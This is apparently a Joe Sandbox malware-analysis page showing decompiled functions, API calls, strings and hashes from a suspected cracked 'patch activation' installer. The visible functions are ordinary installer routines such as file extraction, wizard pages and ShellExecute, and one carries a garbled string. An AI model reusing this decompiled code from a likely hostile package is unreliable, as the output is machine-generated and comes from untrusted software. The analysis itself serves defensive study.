SetActiveWindow.USER32(?,00000000,00485AD6,?,00000000,00485B17,?,?,?,?,00000000,00000000,00000000,?,0046D345), ref: 00485997

Strings

Will not restart Windows automatically., xrefs: 00485AB6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: 9d8835dc8d46110495ea61d090e603bececdbc6f3ad0e802ffcb83f831e3beb0
Instruction ID: f83d4e2d24e7b328884665d644b63d6f540d85ee55f206053ba059ac37762111
Opcode Fuzzy Hash: 9d8835dc8d46110495ea61d090e603bececdbc6f3ad0e802ffcb83f831e3beb0
Instruction Fuzzy Hash: 5E411830204A40DFD715FB64DC85BAE7BE89B25308F5549B7E880D73A2D67C9848D71E

Uniqueness

Uniqueness Score: -1.00%

Function 00478520 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00478520(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
				signed int _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				struct _FILETIME _v28;
				char _v32;
				intOrPtr _t42;
				char _t52;
				void* _t83;
				intOrPtr _t99;
				void* _t104;
				void* _t106;
				void* _t107;
				intOrPtr _t108;

				_t102 = __edi;
				_t106 = _t107;
				_t108 = _t107 + 0xffffffe4;
				_push(__edi);
				_v32 = 0;
				_v16 = 0;
				_t83 = __ecx;
				_v8 = __edx;
				_t104 = __eax;
				_push(_t106);
				_push(0x4786ad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				_t42 =  *0x49f190; // 0x23112b4
				E0042C88C(_t42,  &_v32);
				_t85 = _t104;
				E004035C0( &_v16, _t104, _v32);
				E00403494( &_v32, "Extracting temporary file: ");
				E0040357C( &_v32, _v16);
				E004585A0(_v32, _t83, _t104, __edi, _t104);
				_t52 =  *0x49f451; // 0x1
				_v9 = _t52;
				if(_a4 != 0) {
					E0042CDE4(_v16, _t85,  &_v32);
					E00456A30(_v9, _t83, _v32, __edi, _t104);
				}
				_v20 = E00453754(_v9, 1, 0, 1, 0, _v16);
				_push(_t106);
				_push(0x478664);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				_push(_t106);
				_push(0x478653);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108;
				E0046F1EC(E0046EA34(), _t83, 0, _t83, _t102, _t104);
				E0046F504(E0046EA34(), _t83, _v20, _t83, _t102, _t104, (_v8 & 0xffffff00 | ( *(_v8 + 0x50) & 0x00000080) != 0x00000000) ^ 0x00000001, 0);
				if(( *(_t83 + 0x48) & 0x00000004) == 0) {
					LocalFileTimeToFileTime(_t83 + 0x38,  &_v28);
				} else {
					_v28.dwLowDateTime =  *(_t83 + 0x38);
					_v28.dwHighDateTime =  *((intOrPtr*)(_t83 + 0x3c));
				}
				SetFileTime( *(_v20 + 4), 0, 0,  &_v28);
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(0x47865a);
				return E00402B58(_v20);
			}

0x00478520
0x00478521
0x00478523
0x00478528
0x0047852b
0x0047852e
0x00478531
0x00478533
0x00478536
0x0047853a
0x0047853b
0x00478540
0x00478543
0x00478549
0x0047854e
0x00478559
0x0047855b
0x00478568
0x00478573
0x0047857b
0x00478580
0x00478585
0x0047858c
0x00478594
0x0047859f
0x0047859f
0x004785bd
0x004785c2
0x004785c3
0x004785c8
0x004785cb
0x004785d0
0x004785d1
0x004785d6
0x004785d9
0x004785e5
0x00478603
0x0047860c
0x00478624
0x0047860e
0x00478611
0x00478617
0x00478617
0x00478638
0x0047863f
0x00478642
0x00478645
0x00478652

APIs

LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,00478653,?,00000000,00478664,?,00000000,004786AD), ref: 00478624
SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,00478653,?,00000000,00478664,?,00000000,004786AD), ref: 00478638

Strings

Extracting temporary file: , xrefs: 00478560

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileTime$Local
String ID: Extracting temporary file:
API String ID: 791338737-4171118009
Opcode ID: 2290abf41a45468ae9b49c2647607c51ca9763c2ca4b519ee148fd541fef10b1
Instruction ID: 383de906be10c9968b5e8a45eec8df85735b502e1e4fcc0ad11d623c1d954b10
Opcode Fuzzy Hash: 2290abf41a45468ae9b49c2647607c51ca9763c2ca4b519ee148fd541fef10b1
Instruction Fuzzy Hash: FA41A670A00249AFCB01DFA5CC92EDFBBB8EB09304F51847AF914A7291D7789905CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0046E1B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0046E1B8(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t67;
				void* _t69;
				intOrPtr _t72;

				_push(0xfff5);
				_push(_t69);
				_push(_t67);
				_v8 = __eax;
				L1:
				while(1) {
					do {
						if( *((intOrPtr*)(_v8 + 0x344)) == 0xb &&  *((intOrPtr*)(_v8 + 0x348)) != 0 && ( *((char*)(_v8 + 0x342)) == 0 ||  *0x49f127 != 0)) {
							E00481214( *((intOrPtr*)(_v8 + 0x348)), 0xfff5, 3, 0, _t67, _t69, 1, 1, 0);
							if( *((char*)(_v8 + 0x342)) == 0) {
								 *0x49f488 = 7;
							} else {
								 *0x49f488 = 8;
							}
							E00409070();
						}
						_v12 =  *((intOrPtr*)(_v8 + 0x344));
						_push(0x46e278);
						_push( *[fs:eax]);
						 *[fs:eax] = _t72;
						_t33 = E004185E0( *((intOrPtr*)(_v8 + 0x1bc)), 0);
						_t78 = _t33;
						if(_t33 != 0) {
							E00402C00( *((intOrPtr*)(_v8 + 0x1bc)), 0xfff5, 3, _t78);
						}
						_pop(0);
						_pop(3);
						 *[fs:eax] = 0;
						_t35 = _v8;
						if( *((char*)(_t35 + 0x341)) == 0) {
							goto L13;
						}
						L17:
						return _t35;
						L13:
					} while ( *((intOrPtr*)(_v8 + 0x344)) != _v12);
					_t38 =  *0x49f0f4; // 0x31f3828
					if( *((char*)(_t38 + 0x1ba)) > 1) {
						E004585A0("Failed to proceed to next wizard page; showing wizard.", 0xfff5, 3, _t67, _t69);
						E0048099C(1);
						_t43 =  *0x49e62c; // 0x2252410
						E0042466C(_t43);
						_t45 =  *0x49e62c; // 0x2252410
						SetActiveWindow( *(_t45 + 0x20));
						_t48 =  *0x49f0ac; // 0x31f4d88
						_t35 = E00423294(_t48);
					} else {
						E004585A0("Failed to proceed to next wizard page; aborting.", 0xfff5, 3, _t67, _t69);
						E00409070();
						continue;
					}
					goto L17;
				}
			}

0x0046e1be
0x0046e1bf
0x0046e1c0
0x0046e1c1
0x00000000
0x0046e1c4
0x0046e1c4
0x0046e1ce
0x0046e204
0x0046e213
0x0046e221
0x0046e215
0x0046e215
0x0046e215
0x0046e22b
0x0046e22b
0x0046e239
0x0046e23f
0x0046e244
0x0046e247
0x0046e253
0x0046e258
0x0046e25a
0x0046e269
0x0046e269
0x0046e270
0x0046e272
0x0046e273
0x0046e2a4
0x0046e2ae
0x00000000
0x00000000
0x0046e317
0x0046e31d
0x0046e2b0
0x0046e2b9
0x0046e2c2
0x0046e2ce
0x0046e2e9
0x0046e2f0
0x0046e2f5
0x0046e2fa
0x0046e2ff
0x0046e308
0x0046e30d
0x0046e312
0x0046e2d0
0x0046e2d5
0x0046e2da
0x00000000
0x0046e2da
0x00000000
0x0046e2ce

Strings

Failed to proceed to next wizard page; showing wizard., xrefs: 0046E2E4
Failed to proceed to next wizard page; aborting., xrefs: 0046E2D0

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: 6c0b08fdae734d3c1eb3fe3f4fe9577e29954076c18d8d916fa6dcbbbaf4cb5a
Instruction ID: 70d08a633ec7b89d525ec852f300456f6342c088b46b0ce34def68a00de2c099
Opcode Fuzzy Hash: 6c0b08fdae734d3c1eb3fe3f4fe9577e29954076c18d8d916fa6dcbbbaf4cb5a
Instruction Fuzzy Hash: 1C31B074604240DFD711DB9AD985F9977F9AB15304F6400FBF4049B3A2E738AE84DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 004508A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004508A0(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _t27;
				intOrPtr _t31;
				char* _t47;
				void* _t52;
				intOrPtr _t59;
				void* _t71;

				_v16 = 0;
				_t52 = __eax;
				_push(_t71);
				_push(0x450981);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffffe8;
				_t27 =  *((intOrPtr*)(__edx + 8));
				if( *((intOrPtr*)(_t27 + 8)) == 0x70b &&  *((intOrPtr*)(_t27 + 0xc)) == 0x202) {
					_v12 =  *((intOrPtr*)(_t27 + 0x18));
					_v8 =  *((intOrPtr*)(_t27 + 0x1c));
					_t31 = _v12;
					if(_t31 >= 0 && _t31 < _v8) {
						_t33 = _v8 - _t31 + 1;
						if(_v8 - _t31 + 1 > 1) {
							E004038A4( &_v16, _t33);
							_v28 = _v12;
							_v24 = _v8;
							_v20 = E00403738(_v16);
							E004038A4( &_v16, SendMessageA(E00418670(_t52), 0x44b, 0,  &_v28));
							if(_v16 != 0) {
								_t47 = E00403738(_v16);
								ShellExecuteA(E00418670(_t52), "open", _t47, 0, 0, 1);
							}
						}
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x450988);
				return E00403400( &_v16);
			}

0x004508ab
0x004508ae
0x004508b2
0x004508b3
0x004508b8
0x004508bb
0x004508be
0x004508ca
0x004508e0
0x004508e6
0x004508e9
0x004508ee
0x004508fc
0x00450900
0x00450906
0x0045090e
0x00450914
0x0045091f
0x0045093f
0x00450948
0x00450953
0x00450966
0x00450966
0x00450948
0x00450900
0x004508ee
0x0045096d
0x00450970
0x00450973
0x00450980

APIs

SendMessageA.USER32 ref: 00450935
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450966

Strings

open, xrefs: 00450959

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: 41377852c43bddfddcae31f96e2b69fa43cefbc2a0355827ec7b6d4d68a21241
Instruction ID: 9d2ddf54ec7714fdda98ff8d0cc6f814dd21c32a1b145895e499ae4a69db9d05
Opcode Fuzzy Hash: 41377852c43bddfddcae31f96e2b69fa43cefbc2a0355827ec7b6d4d68a21241
Instruction Fuzzy Hash: 2F212EB4E00604AFEB10DF6AC881B9EB7F8EB44705F10857AB401F7297D6789A45CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00455A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00455A8C(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				signed int _t37;
				void* _t51;
				intOrPtr _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t71;

				_v8 = __ecx;
				_t66 = __edx;
				_t51 = __eax;
				_t68 = _a4;
				E00403728(_a20);
				_push(_t71);
				_push(0x455b71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71 + 0xffffffc0;
				if(_a20 == 0) {
					E0042CD34(_t66, __ecx,  &_a20);
					if(_a20 == 0) {
						E0042DD54( &_a20);
					}
				}
				E00402934( &_v68, 0x3c);
				_v68 = 0x3c;
				_v64 = 0x540;
				if(_t51 != 0) {
					_v56 = E00403738(_t51);
				}
				_v52 = E00403738(_t66);
				_v48 = E00403738(_v8);
				_v44 = E00403738(_a20);
				_v40 = _a12;
				_t37 =  &_v68;
				_push(_t37);
				L0042D134();
				asm("sbb ebx, ebx");
				_t54 =  ~( ~_t37);
				if( ~( ~_t37) != 0) {
					 *_t68 = 0x103;
					_t38 = _v12;
					if(_v12 != 0) {
						E00455778(_t38, _t54, _a16, _t66, _t68, _t68);
					}
				} else {
					 *_t68 = GetLastError();
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00455B78);
				return E00403400( &_a20);
			}

0x00455a95
0x00455a98
0x00455a9a
0x00455a9c
0x00455aa2
0x00455aa9
0x00455aaa
0x00455aaf
0x00455ab2
0x00455ab9
0x00455ac0
0x00455ac9
0x00455ace
0x00455ace
0x00455ac9
0x00455add
0x00455ae2
0x00455ae9
0x00455af2
0x00455afb
0x00455afb
0x00455b05
0x00455b10
0x00455b1b
0x00455b21
0x00455b24
0x00455b27
0x00455b28
0x00455b31
0x00455b33
0x00455b37
0x00455b42
0x00455b48
0x00455b4d
0x00455b56
0x00455b56
0x00455b39
0x00455b3e
0x00455b3e
0x00455b5d
0x00455b60
0x00455b63
0x00455b70

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 00455B28
GetLastError.KERNEL32(0000003C,00000000,00455B71,?,?,?), ref: 00455B39

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

Strings

<, xrefs: 00455AE2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <
API String ID: 893404051-4251816714
Opcode ID: 8905fb652c31356344cf329a6b31199d683e67ad4c0ae43da576633582a19355
Instruction ID: 999fafdfd618aac71dabfb14027d48496d6343d42a6da5b956ec7361bda3743f
Opcode Fuzzy Hash: 8905fb652c31356344cf329a6b31199d683e67ad4c0ae43da576633582a19355
Instruction Fuzzy Hash: 48216570A00609AFDB10DF65D8926AE7BF8EF05345F50443BF844E7291D7789E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00402584(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t24;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t45;

				_t43 = _t45;
				_t40 = __edx;
				_t24 = __eax;
				if( *0x49e419 != 0 || E004019CC() != 0) {
					_push(_t43);
					_push("\xef\xbf					_push( *[fs:edx]);
					 *[fs:edx] = _t45;
					if( *0x49e036 != 0) {
						_push(0x49e420);
						L00401328();
					}
					if(E004023B4(_t24, _t40) == 0) {
						_t37 = E00402088(_t40);
						_t14 = ( *(_t24 - 4) & 0x7ffffffc) - 4;
						if(_t40 < ( *(_t24 - 4) & 0x7ffffffc) - 4) {
							_t14 = _t40;
						}
						if(_t37 != 0) {
							E00402738(_t24, _t14, _t37);
							E00402210(_t24);
						}
						_v8 = _t37;
					} else {
						_v8 = _t24;
					}
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E0040263D);
					if( *0x49e036 != 0) {
						_push(0x49e420);
						L00401330();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00402585
0x0040258b
0x0040258d
0x00402596
0x004025ad
0x004025ae
0x004025b3
0x004025b6
0x004025c0
0x004025c2
0x004025c7
0x004025c7
0x004025d7
0x004025e5
0x004025f3
0x004025f8
0x004025fa
0x004025fa
0x004025fe
0x00402606
0x0040260d
0x0040260d
0x00402612
0x004025d9
0x004025d9
0x004025d9
0x00402617
0x0040261a
0x0040261d
0x00402629
0x0040262b
0x00402630
0x00000000
0x00402630
0x00402635
0x004025a1
0x004025a3
0x00402645
0x00402645

APIs

RtlEnterCriticalSection.KERNEL32(0049E420,00000000,)), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049E420,0040263D), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049E420,0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049E420,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049E420,00401A89,00000000,00401A82,?,?,0040222E,0049E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
Opcode ID: 662812d5b2f770babba1450f84ee1e78b681317e28eec64c8fceec8e84081569
Instruction ID: 917976a40c8b6a40365e5f884633a4dcf06f5f23cdaa1afef62ceea8ee6a87c6
Opcode Fuzzy Hash: 662812d5b2f770babba1450f84ee1e78b681317e28eec64c8fceec8e84081569
Instruction Fuzzy Hash: F61101317042046FEB25EB7A9F1A62A6AD4D795758B24087FF404F33D2D9FD9C02826C

Uniqueness

Uniqueness Score: -1.00%

Function 0049999A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0049999A(void* __ecx, void* __edi, void* __esi) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				void* _t39;
				intOrPtr _t41;
				char _t44;
				void* _t45;
				intOrPtr _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t61;

				_t59 = __esi;
				_t58 = __edi;
				_t45 = __ecx;
				if(( *(_t60 - 9) & 0x00000001) != 0 || ( *(_t60 - 9) & 0x00000040) != 0) {
					_t44 = 1;
				} else {
					_t44 = 0;
				}
				_t21 = E0047A3C8(_t44, _t45, 0);
				_t64 = _t21;
				if(_t21 != 0) {
					_t27 =  *0x49e62c; // 0x2252410
					SetWindowPos( *(_t27 + 0x20), 0, 0, 0, 0, 0, 0x97);
					_push(_t60);
					_push(0x499a3b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					_t32 =  *0x49e62c; // 0x2252410
					 *((intOrPtr*)(_t60 - 0x18)) =  *((intOrPtr*)(_t32 + 0x20));
					 *((char*)(_t60 - 0x14)) = 0;
					E00407D84("/INITPROCWND=$%x ", 0, _t60 - 0x18, _t60 - 0x10);
					_push(_t60 - 0x10);
					E0042D7BC(_t60 - 0x1c, _t44, 0, _t58, _t59, _t64);
					_pop(_t39);
					E0040357C(_t39,  *((intOrPtr*)(_t60 - 0x1c)));
					_t41 =  *0x49f540; // 0x0
					E0047A678(_t41, _t44, 0x49d130,  *((intOrPtr*)(_t60 - 0x10)), _t58, _t59, _t64);
					_pop(_t57);
					 *[fs:eax] = _t57;
					 *((char*)(_t60 - 1)) = 1;
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E00499A96);
				E00403400(_t60 - 0x1c);
				return E00403400(_t60 - 0x10);
			}

0x0049999a
0x0049999a
0x0049999a
0x0049999e
0x004999aa
0x004999a6
0x004999a6
0x004999a6
0x004999b0
0x004999b5
0x004999b7
0x004999cc
0x004999d5
0x004999dc
0x004999dd
0x004999e2
0x004999e5
0x004999ec
0x004999f4
0x004999f7
0x00499a05
0x00499a0d
0x00499a11
0x00499a19
0x00499a1a
0x00499a27
0x00499a2c
0x00499a33
0x00499a36
0x00499a6d
0x00499a6d
0x00499a73
0x00499a76
0x00499a79
0x00499a81
0x00499a8e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004999D5

Strings

@, xrefs: 004999A0
/INITPROCWND=$%x , xrefs: 00499A00

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: b77a36dcc97026e4c7e84e03e5d2da815b65b232eacde215835398ce835a4be4
Instruction ID: 16850a3933f6126195f36b65bc9072021203f0d8c6b6540213bbd0006db66c27
Opcode Fuzzy Hash: b77a36dcc97026e4c7e84e03e5d2da815b65b232eacde215835398ce835a4be4
Instruction Fuzzy Hash: 8B11AF71A042498FDB01DBA9D851BAEBBF9EB98304F50847FE804E7292D63D9D058B58

Uniqueness

Uniqueness Score: -1.00%

Function 00447904 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00447904(intOrPtr* __eax, void* __ebx, char* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v9;
				char _v20;
				char _v24;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _t22;
				intOrPtr _t26;
				char* _t33;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				intOrPtr _t50;

				_t48 = _t49;
				_t50 = _t49 + 0xffffffb0;
				_v80 = 0;
				_v84 = 0;
				_t33 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				_push(_t48);
				_push(0x447c8d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				E00402934( &_v76, 0x20);
				_v24 = E00403CA4(_t33);
				_push(_t48);
				_push(0x4479bc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50;
				if(_v8 == 0) {
					E0040909C("NIL Interface Exception", 1);
					E0040311C();
				}
				_push( &_v20);
				_push(0x800);
				_push(1);
				_push( &_v24);
				_push(0x49c734);
				_t22 = _v8;
				_push(_t22);
				if( *((intOrPtr*)( *_t22 + 0x14))() != 0) {
					E0040909C("Unknown Method", 1);
					E0040311C();
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x4479c3);
				_t26 = _v24;
				_push(_t26);
				L0042D0EC();
				return _t26;
			}

0x00447905
0x00447907
0x0044790f
0x00447912
0x00447915
0x00447917
0x0044791a
0x0044791f
0x00447920
0x00447925
0x00447928
0x00447935
0x00447941
0x00447946
0x00447947
0x0044794c
0x0044794f
0x00447956
0x00447964
0x00447969
0x00447969
0x00447971
0x00447972
0x00447977
0x0044797c
0x0044797d
0x00447982
0x00447985
0x0044798d
0x0044799b
0x004479a0
0x004479a0
0x004479a7
0x004479aa
0x004479ad
0x004479b2
0x004479b5
0x004479b6
0x004479bb

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 004479B6

Strings

Unknown Method, xrefs: 0044798F
NIL Interface Exception, xrefs: 00447958

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: d7c63457d166a350f53d970eb0409965f77a8d21c5a8cfae6addd8da613f3b75
Instruction ID: 6ea0978f5b97d4648a43087cb94c4cadf7395b3a3abdd2f7dcac649bd3e58428
